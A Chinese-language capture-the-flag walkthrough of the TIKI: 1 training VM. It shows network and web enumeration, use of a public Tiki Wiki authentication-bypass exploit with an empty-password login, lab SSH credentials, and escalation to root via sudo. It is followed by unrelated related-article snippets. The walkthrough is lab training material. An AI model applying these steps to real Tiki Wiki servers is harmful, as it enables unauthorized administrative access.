红队渗透靶机:TIKI: 1

news2024/11/26 10:47:27

目录

信息收集

1、arp

2、nmap

3、nikto

4、whatweb

目录探测

1、dirsearch

2、gobuster

WEB

web信息收集

searchsploit

cms信息收集

ssh登录

提权

信息收集

1、arp
┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.110.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.110.1   00:50:56:c0:00:08       VMware, Inc.
192.168.110.2   00:50:56:ec:d1:ca       VMware, Inc.
192.168.110.148 00:50:56:2d:9f:50       VMware, Inc.
192.168.110.254 00:50:56:ff:50:cf       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.371 seconds (107.97 hosts/sec). 4 responded

2、nmap
端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.110.148 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-04 08:56 CST
Nmap scan report for 192.168.110.148
Host is up (0.00072s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:50:56:2D:9F:50 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.82 seconds


信息探测

┌──(root㉿ru)-[~/kali]
└─# nmap -sVC -O -p 22,80,139,445 192.168.110.148 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-04 08:57 CST
Nmap scan report for 192.168.110.148
Host is up (0.00055s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 a3:d8:4a:89:a9:25:6d:07:c5:3d:76:28:06:ed:d1:c0 (RSA)
|   256 e7:b2:89:05:54:57:dc:02:f4:8c:3a:7c:55:8b:51:aa (ECDSA)
|_  256 fd:77:07:2b:4a:16:3a:01:6b:e0:00:0c:0a:36:d8:2f (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/tiki/
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2
MAC Address: 00:50:56:2D:9F:50 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: -1s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
|   date: 2024-02-04T00:57:39
|_  start_date: N/A

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.11 seconds


3、nikto
┌──(root㉿ru)-[~/kali]
└─# nikto -h http://192.168.110.148
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.110.148
+ Target Hostname:    192.168.110.148
+ Target Port:        80
+ Start Time:         2024-02-04 08:59:43 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /tiki/: Cookie javascript_enabled_detect created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /robots.txt: contains 1 entry which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.41 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5ab91fa8e8bd0, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /tiki/tiki-install.php: Tiki 1.7.2 and previous allowed restricted Wiki pages to be viewed via a 'URL trick'. Default login/pass could be admin/admin.
+ 8103 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2024-02-04 09:00:02 (GMT8) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

4、whatweb
┌──(root㉿ru)-[~/kali]
└─# whatweb http://192.168.110.148/
http://192.168.110.148/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[192.168.110.148], Title[Apache2 Ubuntu Default Page: It works]

目录探测

1、dirsearch
┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.110.148 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.110.148/_24-02-04_09-02-38.txt

Target: http://192.168.110.148/

[09:02:38] Starting:
[09:03:27] 200 -   42B  - /robots.txt
[09:03:40] 301 -  317B  - /tiki  ->  http://192.168.110.148/tiki/
[09:03:40] 200 -  526B  - /tiki/doc/stable.version

Task Completed

2、gobuster
┌──(root㉿ru)-[~/kali]
└─# gobuster dir -u http://192.168.110.148/ -x php,txt,html -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.110.148/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/index.html           (Status: 200) [Size: 10918]
/robots.txt           (Status: 200) [Size: 42]
/tiki                 (Status: 301) [Size: 317] [--> http://192.168.110.148/tiki/]
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/server-status        (Status: 403) [Size: 280]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
===============================================================

WEB

web信息收集




经过robots.txt的提示,我们找到一个cms!但是没有用户名和密码!


在源码中可以找到cms的全称!Tiki Wiki CMS Groupware

searchsploit
searchsploit Tiki Wiki CMS Groupware


使用searchsploit搜索发现存在漏洞!而且有很多利用漏洞!第二个是身份验证绕过!我们尝试一下!


我们下载到本地!利用!


┌──(root㉿ru)-[~/kali]
└─# python3 48927.py 192.168.110.148
Admin Password got removed.
Use BurpSuite to login into admin without a password
Admin Password got removed.
Use BurpSuite to login into admin without a password
Admin Password got removed.
Use BurpSuite to login into admin without a password
Admin Password got removed.
Use BurpSuite to login into admin without a password
Admin Password got removed.
Use BurpSuite to login into admin without a password
Admin Password got removed.
Use BurpSuite to login into admin without a password
Admin Password got removed.
Use BurpSuite to login into admin without a password
Admin Password got removed.
Use BurpSuite to login into admin without a password
Admin Password got removed.
Use BurpSuite to login into admin without a password
Admin Password got removed.
Use BurpSuite to login into admin without a password

这个漏洞是攻击者能够暴力破解 Tiki Wiki 管理员帐户,直到在 50 次无效登录尝试后该帐户被锁定。然后攻击者可以使用空密码进行管理员身份验证并获得完整的帐户访问权限。

网页不允许我们将密码字段留空,但 Burpsuite 可以,所以这就是它的用武之地。然后我们可以在浏览器中显示响应,我们以管理员身份登录。


直接抓取登陆包!然后把密码置空,就可以登录成功!

cms信息收集


点击!




同理,我们点击这个!


silky:Agy8Y7SPJNXQzqA

得到用户名以及密码!我们尝试ssh登录!

ssh登录
┌──(root㉿ru)-[~/kali]
└─# ssh silky@192.168.110.148
The authenticity of host '192.168.110.148 (192.168.110.148)' can't be established.
ED25519 key fingerprint is SHA256:XflXXBfe5SUYLsljbJnki2yJdH6w++09xXrSiLwKWc4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.110.148' (ED25519) to the list of known hosts.
silky@192.168.110.148's password:
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-42-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


1 Aktualisierung kann sofort installiert werden.
0 dieser Aktualisierung sind Sicherheitsaktualisierungen.
Um zu sehen, wie diese zusätzlichen Updates ausgeführt werden: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Your Hardware Enablement Stack (HWE) is supported until April 2025.
Last login: Fri Jul 31 09:50:24 2020 from 192.168.56.1
silky@ubuntu:~$ id
uid=1000(silky) gid=1000(silky) Gruppen=1000(silky),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare)
silky@ubuntu:~$

提权

silky@ubuntu:~$ sudo -l
[sudo] Passwort für silky:
Passende Defaults-Einträge für silky auf ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

Der Benutzer silky darf die folgenden Befehle auf ubuntu ausführen:
    (ALL : ALL) ALL
silky@ubuntu:~$ sudo su
root@ubuntu:/home/silky# id
uid=0(root) gid=0(root) Gruppen=0(root)
root@ubuntu:/home/silky#

root@ubuntu:/home/silky# cd /root
root@ubuntu:~# ls
flag.txt
root@ubuntu:~# cat flag.txt

 ██████╗ ██████╗ ███╗   ██╗ ██████╗ ██████╗  █████╗ ████████╗██╗   ██╗██╗      █████╗ ████████╗██╗ ██████╗ ███╗   ██╗███████╗██╗
██╔════╝██╔═══██╗████╗  ██║██╔════╝ ██╔══██╗██╔══██╗╚══██╔══╝██║   ██║██║     ██╔══██╗╚══██╔══╝██║██╔═══██╗████╗  ██║██╔════╝██║
██║     ██║   ██║██╔██╗ ██║██║  ███╗██████╔╝███████║   ██║   ██║   ██║██║     ███████║   ██║   ██║██║   ██║██╔██╗ ██║███████╗██║
██║     ██║   ██║██║╚██╗██║██║   ██║██╔══██╗██╔══██║   ██║   ██║   ██║██║     ██╔══██║   ██║   ██║██║   ██║██║╚██╗██║╚════██║╚═╝
╚██████╗╚██████╔╝██║ ╚████║╚██████╔╝██║  ██║██║  ██║   ██║   ╚██████╔╝███████╗██║  ██║   ██║   ██║╚██████╔╝██║ ╚████║███████║██╗
 ╚═════╝ ╚═════╝ ╚═╝  ╚═══╝ ╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═╝   ╚═╝    ╚═════╝ ╚══════╝╚═╝  ╚═╝   ╚═╝   ╚═╝ ╚═════╝ ╚═╝  ╚═══╝╚══════╝╚═╝

You did it ^^
I hope you had fun.
Share your flag with me on Twitter: S1lky_1337


flag:88d8120f434c3b4221937a8cd0668588




root@ubuntu:~#

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1433411.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

基于tomcat的https(ssl)双向认证

一、背景介绍 某个供应商服务需要部署到海外&#xff0c;如果海外多个地区需要部署多个服务&#xff0c;最好能实现统一登录&#xff0c;这样可以减轻用户的使用负担&#xff08;不用记录一堆密码&#xff09;。由于安全问题&#xff08;可能会泄露用户数据&#xff09;&#x…

k8s学习-Kubernetes的包管理器Helm

1.1 为何需要Helm Kubernetes能够很好地组织和编排容器&#xff0c;但它缺少⼀个更高层次的应用打包工具&#xff0c;而Helm就是来干这件事的。 先来看个例子。 比如对于⼀个MySQL服务&#xff0c;Kubernetes需要部署下面这些对象&#xff1a; &#xff08;1&#xff09;Serv…

2. 从波动方程到亥姆赫兹方程

波动方程中同时包含了时间和空间分量&#xff0c;为进一步简化波动方程&#xff0c;可以假设电场分量为 &#xff08;1&#xff09; &#xff08;注&#xff1a;这个假设对我而言有点突兀&#xff0c;但我想对于数学好的人来说就是一个常见的解题思路。可能就像高中数列题&…

【开源】JAVA+Vue+SpringBoot实现二手车交易系统

目录 一、摘要1.1 项目介绍1.2 项目录屏 二、功能模块2.1 数据中心模块2.2 二手车档案管理模块2.3 车辆预约管理模块2.4 车辆预定管理模块2.5 车辆留言板管理模块2.6 车辆资讯管理模块 三、系统设计3.1 E-R图设计3.2 可行性分析3.2.1 技术可行性分析3.2.2 操作可行性3.2.3 经济…

用于医疗行业的大功率电阻器是什么?

设计医疗电子设备比设计其他行业应用更具挑战性。由于涉及宝贵的生命&#xff0c;因此各种医疗设备中使用的产品和组件必须绝对可靠且安全&#xff0c;毋庸置疑。即使是各种国际机构制定的合规和安全标准&#xff0c;在医疗保健行业也更加严格&#xff0c;这是正确的。 无源电气…

Re-understanding of data storytelling tools from a narrative perspective

作者&#xff1a;任芃锟, 王轶 & 赵凡 发表&#xff1a;Visual Intelligence&#xff0c;新刊&#xff0c;实行单盲同行评议制度。由施普林格以开放获取 (Open Access) 模式出版。获2022“中国科技期刊卓越行动计划高起点新刊”项目资助&#xff0c;目前出版不收取文章处理…

onlyfans无法订阅?2024年订阅onlyfans最新教程一键直达

讲在前面-关于OnlyFans 欧美除了脸书和推特之外&#xff0c;又新起了一个社交软件&#xff0c;它就是onlyfans&#xff0c;简称o站。 在极短的时间内&#xff0c;它就拥有了1.2亿的用户量&#xff0c;而全站订阅金额更是达到了17亿英镑&#xff0c;换成人民币&#xff0c;数额…

使用docker/docker-compose通过自定义的redis.conf文件启动redis 7.2.3,附上docker-compose.yml的redis配置

目录 一.复制以及使用自定义的redis.conf文件 1.在官网拷贝对应版本的配置文件内容新建redis.conf文件进行粘贴。&#xff08;推荐&#xff09; 2.也可以去官网下载对应版本的redis的tar.gz包&#xff0c;解压后在根目录下找到redis.conf文件复制也可也可。 二.配置redis.c…

机器学习复习(8)——基本概念

目录 "benchmark"和"baseline"的定义和区别 R1 score概念 LoRA微调概念 "benchmark"和"baseline"的定义和区别 在计算机视觉领域的论文中&#xff0c;"benchmark"和"baseline"这两个术语经常被使用&#xff0…

BootStrap学习笔记JS插件(一)--模态弹出框

一、弹出框基础 <div class"modal show"><div class"modal-dialog"><div class"modal-content"><div class"modal-header"><button type"button" class"close" data-dismiss"mo…

惠普公司也要注销了?

关注卢松松&#xff0c;会经常给你分享一些我的经验和观点。 惠普科技(上海)有限公司企业状态由存续变更为注销&#xff0c;这意味着惠普公司也要注销了?这是怎么回事?戴尔公司也准备注销了呢?这家美国科技巨头为什么放弃了世界最大的消费市场呢? 之前就有消息称惠普中国…

BFS——双向广搜+A—star

有时候从一个点能扩展出来的情况很多&#xff0c;这样几层之后搜索空间就很大了&#xff0c;我们采用从两端同时进行搜索的策略&#xff0c;压缩搜索空间。 190. 字串变换(190. 字串变换 - AcWing题库) 思路&#xff1a;这题因为变化规则很多&#xff0c;所以我们一层一层往外…

新开发板-正点原子的rk3568

有好长一段时间没有更新博客了&#xff0c;上次更新还是在上次...哈哈开个玩笑&#xff0c;上次stm32f407的定时器还没写完&#xff0c;就备战期末去了&#xff08;电信学院&#xff0c;你懂的&#xff09;&#xff0c;一直没更新&#xff0c;原因是我实习去了&#xff0c;在忙…

Java项目管理01-Maven基础

一、Maven的常用命令和生命周期 1.Maven的常用命令使用方式 complie&#xff1a;编译&#xff0c;将java文件编译为class字节码文件 clean&#xff1a;清理&#xff0c;删除字节码文件 test&#xff1a;测试&#xff0c;运行项目中的test类 package&#xff1a;打包&#x…

IDEA新建文件夹后右击不能创建class类排错方法

目录 1 查看自身文件名是否为关键词 2 查看是否被“蓝色文件夹”给包含了 3 检查设置那边的class模板 4 报错解决 1 查看自身文件名是否为关键词 如下使用了 Java中的关键词"class"所以才无法创建包 ---------------------------------------------------------…

51单片机之LED灯模块篇

御风以翔 破浪以飏 &#x1f3a5;个人主页 &#x1f525;个人专栏 目录 点亮一盏LED灯 LED的组成原理 LED的硬件模型 点亮一盏LED灯的程序设计 LED灯闪烁 LED流水灯 独立按键控制LED灯亮灭 独立按键的组成原理 独立按键的硬件模型 独立按键控制LED灯状态 按键的抖动 独立按键…

KubeMQ简介

如今&#xff0c;企业组织之间的竞争是残酷的。每个组织都希望在其系统之间即时、实时或近乎实时地交换信息&#xff0c;以便做出更好、更快的决策。为了使此类信息持续流动&#xff0c;应用程序组件之间的集成需要无缝。为了充分利用云计算的所有优势&#xff0c;如今构建的应…

双非本科准备秋招(16.1)—— 力扣二叉树

1、101. 对称二叉树 检查是否对称&#xff0c;其实就是检查左节点等不等于右节点&#xff0c;我们可以用递归来做。 如果左右节点都为null&#xff0c;说明肯定对称呀&#xff0c;返回true。 如果一个为null一个不为null&#xff0c;或者左右的值不相等&#xff0c;则为false。…

k8s-深入理解Service(为Pod提供负载均衡和发现)

一、Service存在的意义 二、Service的定义和创建 Pod与Service的关系 Service的定义和创建 三、Service使用NodePort对外暴露应用 四种类型&#xff0c;常用的三种&#xff1a; 指定Service的NodePort端口 在实际生产中&#xff0c;k8s的集群不会直接暴露在公网中&#xff0c…

free5GC+UERANSIM

使用arp、ifconfig、docker inspect及网桥brctl 相关命令&#xff0c;收集容器IP及Mac地址相关信息&#xff0c;可以梳理出UERANSIMfree5GC模拟环境组网&#xff0c;如下图所示&#xff1a; 如上图所示&#xff1a;环境基于ubuntu 18.04 VMware虚机部署&#xff0c;5GC网元分别…